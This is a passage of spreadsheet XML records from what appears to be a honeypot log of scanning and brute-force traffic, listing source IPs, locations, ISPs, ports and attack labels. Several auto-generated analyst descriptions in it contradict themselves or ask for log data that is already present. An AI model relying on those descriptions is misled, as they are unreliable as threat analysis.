    <s v="None&amp;&amp;C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <s v="No suspicious TELNET activity detected._x000a_TELNET connections are typically used for remote access, but this entry indicates no attempts were made._x000a__x000a_The presence of 'NA' (not available) suggests that the service was not accessed or interacted with in any way during the monitoring period."/>
    <m/>
  </r>
  <r>
    <x v="829"/>
    <x v="829"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-25T18:44:02"/>
    <d v="2024-03-06T23:58:00"/>
    <d v="2025-04-25T18:44:02"/>
    <n v="126"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;Suspicious Web Activity Detected"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SSH_H3&amp;&amp;SMA-LAB_MT-CPA_H44&amp;&amp;SMA-LAB_SSH_H28&amp;&amp;SMA-LAB_MT-CPA_H47&amp;&amp;SMA-LAB_MT-CPA_H23&amp;&amp;SMA-LAB_POP3_HC1&amp;&amp;SMA-LAB_MT-CPA_H43"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;22&amp;&amp;53267&amp;&amp;22&amp;&amp;36754&amp;&amp;50160&amp;&amp;110&amp;&amp;53685&amp;&amp;55988&amp;&amp;52347&amp;&amp;56451&amp;&amp;25&amp;&amp;49627&amp;&amp;52811&amp;&amp;50206&amp;&amp;443&amp;&amp;6667"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']&amp;&amp; 'dnsbl-2.uceprotect.net': ['unknown']}"/>
    <n v="68"/>
    <s v="True"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="CA"/>
    <s v="California"/>
    <s v="Santa Clara"/>
    <s v="Santa Clara"/>
    <s v="5393015"/>
    <s v="95054"/>
    <s v="37.3833"/>
    <s v="-121.983"/>
    <s v="396982"/>
    <s v="Google LLC"/>
    <s v="Google LLC"/>
    <s v="hosting"/>
    <s v="Palo Alto Networks, Inc"/>
    <s v="2023-09-07"/>
    <s v="PAN-22"/>
    <s v="2023-09-07"/>
    <s v="NA&amp;&amp;connection&amp;&amp;command"/>
    <s v="NA&amp;&amp;{Data_SMTP:{'arg': '/', 'command': 'GET', 'data': 'HTTP/1.1'}}&amp;&amp;{Data_SMTP:{'arg': '94.131.113.33:25', 'command': 'HOST:', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'Expanse,', 'command': 'USER-AGENT:', 'data': 'a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers&amp;#39; presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com'}}&amp;&amp;{Data_SMTP:{'arg': 'gzip', 'command': 'ACCEPT-ENCODING:', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': '', 'data': 'None'}}&amp;&amp;{Data_IRC:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:93b9:850d"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="830"/>
    <x v="830"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-25T18:38:57"/>
    <d v="2023-11-22T06:48:50"/>
    <d v="2025-04-25T18:38:57"/>
    <n v="232"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H22&amp;&amp;SMA-LAB_MSSQL_H34&amp;&amp;SMA-LAB_MSSQL_HC1"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;13460&amp;&amp;1433&amp;&amp;445"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']&amp;&amp; 'z.mailspike.net': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['exploits'&amp;&amp; 'unknown']}"/>
    <n v="108"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="WB"/>
    <s v="West Bengal"/>
    <s v="Dinajpur Uttar"/>
    <s v="Kāliyāganj"/>
    <s v="1268383"/>
    <s v="NA"/>
    <s v="25.6344"/>
    <s v="88.3267"/>
    <s v="58765"/>
    <s v="B TEL INTERNET PRIVATE LIMITED"/>
    <s v="REGENT"/>
    <s v="residential"/>
    <s v="Regent Park Broadband And Allied Services Pvt Ltd"/>
    <s v="2015-03-17"/>
    <s v="REGENT-IN"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (45.113.91.111,61613)}&amp;&amp;{Data_SMB:Incoming connection (45.113.91.111,61649)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (45.113.91.111,56044)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (45.113.91.111,56115)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (45.113.91.111,52984)}&amp;&amp;{Data_SMB:Incoming connection (45.113.91.111,53759)}&amp;&amp;{Data_SMB:Incoming connection (45.113.91.111,53831)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (45.113.91.111,56698)}&amp;&amp;{Data_SMB:Incoming connection (45.113.91.111,50199)}&amp;&amp;{Data_SMB:Incoming connection (45.113.91.111,50295)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (45.113.91.111,54659)}&amp;&amp;{Data_SMB:Incoming connection (45.113.91.111,54751)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:2d71:5b6f"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <s v="SMB Scanning &amp;&amp; SMB Brute"/>
  </r>
  <r>
    <x v="831"/>
    <x v="831"/>
    <s v="59-127-129-37.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-25T18:10:46"/>
    <d v="2024-05-29T09:33:50"/>
    <d v="2025-04-25T18:10:46"/>
    <n v="674"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;Suspicious Web Activity Detected"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_DNS_H36&amp;&amp;SMA-LAB_MT-CPA_H22&amp;&amp;SMA-LAB_HTTP_H11&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_MT-CPA_H28&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_MT-CPA_H17&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H18"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;53&amp;&amp;56993&amp;&amp;80&amp;&amp;23&amp;&amp;14724&amp;&amp;37027&amp;&amp;9100&amp;&amp;50981&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GET&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '194.233.76.135:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.54.117.64:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '185.74.222.213:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3b7f:8125"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="832"/>
    <x v="832"/>
    <s v="114-32-168-119.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-25T18:10:09"/>
    <d v="2024-03-28T17:56:14"/>
    <d v="2025-04-25T18:10:09"/>
    <n v="374"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:ssh']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;Suspicious Web Activity Detected"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;abuseipdb&amp;&amp;SMA-LAB_MT-CPA_H44&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_HTTP_H9&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_HTTP_H22&amp;&amp;SMA-LAB_HTTP_H17&amp;&amp;SMA-LAB_HTTP_H11&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H11"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;NA&amp;&amp;17127&amp;&amp;80&amp;&amp;9100"/>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GET&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '144.126.148.5:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.224.106:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '94.131.113.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.171.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7220:a877"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="833"/>
    <x v="833"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-25T17:11:45"/>
    <d v="2025-04-25T17:11:45"/>
    <d v="2025-04-25T17:11:45"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_LDAP_HC1"/>
    <s v="389"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Raigad"/>
    <s v="Navi Mumbai (Panvel)"/>
    <s v="6619347"/>
    <s v="NA"/>
    <s v="18.9894"/>
    <s v="73.1175"/>
    <s v="132335"/>
    <s v="LEAPSWITCH-IN-AS-AP"/>
    <s v="Keep Secure Cloud Services PVT LTD"/>
    <s v="hosting"/>
    <s v="Keep Secure Cloud Services PVT LTD"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_LDAP:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:67a5:76b5"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="This log indicates an attempt to access LDAP services without providing any valid data, potentially indicating an unauthorized access attempt or a brute-force attack. The attacker is trying to exploit the service by sending invalid credentials. No valid authentication data was provided. &amp;&amp; Unknown activity detected, possibly related to an attempt to access or exploit the LDAP service._x000a_This could be a reconnaissance phase of a larger attack._x000a_The exact nature and intent are unclear without further investigation."/>
    <s v="LDAP Brute &amp;&amp; LDAP scan"/>
  </r>
  <r>
    <x v="834"/>
    <x v="834"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-25T17:10:49"/>
    <d v="2025-04-25T17:10:49"/>
    <d v="2025-04-25T17:10:49"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KL"/>
    <s v="Kerala"/>
    <s v="Thrissur"/>
    <s v="Thrissur"/>
    <s v="1254187"/>
    <s v="680001"/>
    <s v="10.5276"/>
    <s v="76.2144"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="BSNL Internet"/>
    <s v="consumer"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75dd:9c0d"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="This indicates that there was an unsuccessful attempt to connect to the telnet service, likely a scanning activity or reconnaissance effort by malicious actors to identify open ports and services. The lack of successful connection suggests the target may have implemented security measures. A potential attack vector has been probed. &amp;&amp; The log data suggests that there is an attempt to initiate TELNET connections, which could indicate scanning or reconnaissance activities from potential attackers trying to exploit vulnerabilities. This may be the first step in launching a malicious attack on the system. It's likely a probing activity."/>
    <s v="Telnet Attack &amp;&amp; Port Scan"/>
  </r>
  <r>
    <x v="835"/>
    <x v="835"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-25T17:01:14"/>
    <d v="2025-04-25T17:01:14"/>
    <d v="2025-04-25T17:01:14"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Mumbai Suburban"/>
    <s v="Mumbai"/>
    <s v="1275339"/>
    <s v="400001"/>
    <s v="19.076"/>
    <s v="72.8777"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="MTNL Mumbai"/>
    <s v="corporate"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:783d:78db"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="No connection established via TELNET service. Malicious activity possible if no connection was made as expected. Indicates potential unauthorized access attempt or scan. &amp;&amp; No malicious activity detected, connection attempt was made to a service that is either closed or being monitored. The service may be dormant or not configured for Telnet connections. Connection attempt was met with no response."/>
    <s v="Port Scanning &amp;&amp; Telnet Brute"/>
  </r>
  <r>
    <x v="836"/>
    <x v="836"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-25T16:56:55"/>
    <d v="2023-08-03T19:03:00"/>
    <d v="2025-04-25T16:56:55"/>
    <n v="579"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SMB_H33&amp;&amp;SMA-LAB_MT-CPA_H40&amp;&amp;SMA-LAB_MYSQL_H13&amp;&amp;SMA-LAB_MSSQL_H29&amp;&amp;SMA-LAB_MSSQL_H13&amp;&amp;SMA-LAB_MSSQL_H30&amp;&amp;SMA-LAB_MT-CPA_H25&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_SMB_H44"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;445&amp;&amp;1256&amp;&amp;3306&amp;&amp;1433&amp;&amp;5805"/>
    <s v="True"/>
    <s v="{'dnsbl-3.uceprotect.net': ['unknown']&amp;&amp; 'z.mailspike.net': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['unknown']}"/>
    <n v="106"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Bengaluru Urban"/>
    <s v="Bengaluru"/>
    <s v="1277333"/>
    <s v="560056"/>
    <s v="12.9716"/>
    <s v="77.5946"/>
    <s v="24309"/>
    <s v="Atria Convergence Technologies Pvt. Ltd.,"/>
    <s v="Atria Convergence Technologies Pvt. Ltd"/>
    <s v="residential"/>
    <s v="Atria Convergence Technologies Pvt Ltd"/>
    <s v="2004-09-21"/>
    <s v="CableLite"/>
    <s v="None"/>
    <s v="login&amp;&amp;connection"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_SMB:Incoming connection (202.83.19.155,58350)}&amp;&amp;{Data_SMB:Incoming connection (202.83.19.155,58744)}&amp;&amp;{Data_SMB:Incoming connection (202.83.19.155,53609)}&amp;&amp;{Data_SMB:Incoming connection (202.83.19.155,53988)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (202.83.19.155,58089)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (202.83.19.155,55641)}&amp;&amp;{Data_SMB:Incoming connection (202.83.19.155,56687)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (202.83.19.155,51233)}&amp;&amp;{Data_SMB:Incoming connection (202.83.19.155,51872)}&amp;&amp;{Data_SMB:Incoming connection (202.83.19.155,54989)}&amp;&amp;{Data_SMB:Incoming connection (202.83.19.155,55416)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:ca53:139b"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="medium&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="837"/>
    <x v="837"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-25T16:44:14"/>
    <d v="2023-12-12T11:52:00"/>
    <d v="2025-04-25T16:44:14"/>
    <n v="7173"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H42&amp;&amp;SMA-LAB_MSSQL_H36&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H26"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;8878&amp;&amp;1433&amp;&amp;445&amp;&amp;10771&amp;&amp;10772&amp;&amp;7332&amp;&amp;7622&amp;&amp;4039&amp;&amp;4040"/>
    <s v="True"/>
    <s v="{'dnsbl-3.uceprotect.net': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['unknown']}"/>
    <n v="73"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Bengaluru Urban"/>
    <s v="Bengaluru (Industrial Layout)"/>
    <s v="1277333"/>
    <s v="560056"/>
    <s v="12.8884"/>
    <s v="77.6387"/>
    <s v="24560"/>
    <s v="Bharti Airtel Limited"/>
    <s v="BHARTI"/>
    <s v="business"/>
    <s v="UL_MANAGEMENT SYSTEM"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="login&amp;&amp;connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (122.166.121.133,15484)}&amp;&amp;{Data_SMB:Incoming connection (122.166.121.133,15710)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (122.166.121.133,6934)}&amp;&amp;{Data_SMB:Incoming connection (122.166.121.133,14074)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7aa6:7985"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <s v="There is no log data provided, making it impossible to analyze or describe any possible malicious activity."/>
    <s v="There is no log data provided. Please share the actual log data for analysis."/>
  </r>
  <r>
    <x v="838"/>
    <x v="838"/>
    <s v="220-141-226-137.dynamic-ip.hinet.net"/>
    <x v="0"/>
    <d v="2025-04-25T16:28:52"/>
    <d v="2025-04-25T16:28:52"/>
    <d v="2025-04-25T16:28:52"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TW"/>
    <s v="Taiwan"/>
    <s v="NA"/>
    <s v="Taiwan"/>
    <s v="Taipei City"/>
    <s v="Neihu District"/>
    <s v="1671467"/>
    <s v="NA"/>
    <s v="25.0689"/>
    <s v="121.591"/>
    <s v="3462"/>
    <s v="HINET"/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="corporate"/>
    <s v="Chunghwa Telecom Co. Ltd."/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET: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dc8d:e289"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="839"/>
    <x v="839"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-25T16:19:43"/>
    <d v="2024-11-29T11:16:06"/>
    <d v="2025-04-25T16:19:43"/>
    <n v="84"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MT-CPA_H11&amp;&amp;SMA-LAB_SMB_H40&amp;&amp;SMA-LAB_SMB_H12&amp;&amp;SMA-LAB_SMB_H15&amp;&amp;SMA-LAB_SMB_H41&amp;&amp;SMA-LAB_SMB_H11&amp;&amp;SMA-LAB_SMB_H26&amp;&amp;SMA-LAB_SMB_H5&amp;&amp;SMA-LAB_SMB_H20&amp;&amp;SMA-LAB_SMB_H10"/>
    <s v="1433&amp;&amp;15919&amp;&amp;445"/>
    <s v="True"/>
